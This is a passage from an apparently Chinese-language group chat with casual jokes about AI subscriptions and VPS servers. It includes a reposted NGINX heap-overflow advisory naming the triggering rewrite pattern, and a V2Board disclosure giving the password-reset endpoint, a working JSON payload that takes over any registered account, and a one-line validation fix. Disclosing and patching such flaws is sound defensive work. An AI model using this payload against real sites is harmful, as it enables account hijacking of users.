Elysia channel

old图

阿里的ESA和edgeone有什么区别，优势？

我叫豆包已经给群友北大录取通知书了，不用客气

对不起，各位哥哥姐姐，其实我一直在欺骗你们，伪装成一个大人真的好累啊，每天都要在意自己的言行举止，我现在想说出真相了，我其实今年刚上小学三年级。今天是儿童节可以送我礼物吗？我只要一年chatgpt pro 20x订阅+ 1年Google AI ultra订阅+ー年claude订阅+ー年CN2-GIA+AS9929+CMIN2双向三网优化的vps服务器就行了

不是哥们你能不能吃点好的

懂你意思

NGINX 再曝高危漏洞：rewrite 模块堆溢出可致 RCE（CVE-2026-9256） NGINX Plus 与 NGINX Open Source 的 ngx_http_rewrite_module 存在堆缓冲区溢出漏洞，触发条件为：rewrite 指令中使用了含有嵌套重叠 PCRE 捕获组的正则（如 ^/((.*))$），且替换字符串同时引用多个捕获组（如 $1$2）并用于 redirect 或 arguments 场景。在此条件下，NGINX 低估 URI 转义后的输出长度，导致 worker 进程堆溢出，未认证攻击者可通过构造特定 HTTP 请求稳定触发 DoS；在 ASLR 未启用或可被绕过的系统上，存在进一步实现 RCE 的可能。此前已针对 CVE-2026-42945 升级至 1.31.0 / 1.30.1 的环境对本漏洞仍然暴露，需再次升级。修复版本：NGINX Open Source 1.31.1 / 1.30.2，NGINX Plus R36 P5 / R37.0.1.1。 来源：https://nvd.nist.gov/vuln/detail/CVE-2026-9256

每次扫黄都有你

懂你意思

V2Board及其所有分支漏洞，影响全部版本，该漏洞可修改一切已注册用户账号密码 复现方式： API端点：api/v1/passport/auth/forget Payload：

{
    "email":"任意一个已注册用户",
    "password": "密码",
    "email_code": false
}

即可重置对应账户密码 最小改动修复方式： app/Http/Requests/Passport/AuthForget.php 找到'email_code' => 'required' 改成'email_code' => 'required|string|digits:6'

群友不要云开了

梨花飘落在你窗前~

听说您在用NVIDIA显卡？